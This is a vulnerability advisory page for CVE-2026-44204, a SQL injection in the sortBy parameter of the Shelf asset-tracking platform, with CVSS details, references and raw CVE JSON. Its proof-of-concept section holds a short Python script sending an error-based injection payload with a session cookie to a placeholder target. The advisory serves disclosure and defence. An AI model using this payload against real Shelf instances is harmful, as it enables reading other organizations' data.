Security Vulnerability Report
CVE-2026-44204 CVSS 6.5 MEDIUM

Published: 2026-05-12 18:17:30
Last Modified: 2026-05-12 18:17:30

Description

Shelf is a platform for tracking physical assets. From 1.12 to before 1.20.1, a SQL injection vulnerability in the sortBy query parameter on the /assets route allows any authenticated user (any role) to execute arbitrary SQL and read data from any table in the database, including data belonging to other organizations. This vulnerability is fixed in 1.20.1.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

Shelf >= 1.12, < 1.20.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target URL
url = "https://target-shelf-instance.com/assets"

# Authenticated session cookie (Required)
cookies = {
    "shelf_session": "valid_session_token_here"
}

# Malicious payload for sortBy parameter
# Attempting to extract database version via blind injection or error based
payload = "(SELECT CASE WHEN (1=1) THEN id ELSE 1/0 END)"

params = {
    "sortBy": payload
}

try:
    response = requests.get(url, params=params, cookies=cookies, timeout=10)
    if response.status_code == 200:
        print("Request sent successfully. Check response for SQL errors or timing differences.")
        print(response.text[:200])  # Print partial response
    else:
        print(f"Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"An error occurred: {e}")

References

https://github.com/Shelf-nu/shelf.nu/commit/5d35c15856dbf267fab4dccafd077ee7a6fa6f40
https://github.com/Shelf-nu/shelf.nu/security/advisories/GHSA-69xv-wmgg-3qp3

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-44204",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-12T18:17:29.883",
    "lastModified": "2026-05-12T18:17:29.883",
    "vulnStatus": "Received",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Shelf is a platform for tracking physical assets. From 1.12 to before 1.20.1, a SQL injection vulnerability in the sortBy query parameter on the /assets route allows any authenticated user (any role) to execute arbitrary SQL and read data from any table in the database, including data belonging to other organizations. This vulnerability is fixed in 1.20.1."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-20"},
          {"lang": "en", "value": "CWE-89"}
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/Shelf-nu/shelf.nu/commit/5d35c15856dbf267fab4dccafd077ee7a6fa6f40",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/Shelf-nu/shelf.nu/security/advisories/GHSA-69xv-wmgg-3qp3",
        "source": "[email protected]"
      }
    ]
  }
}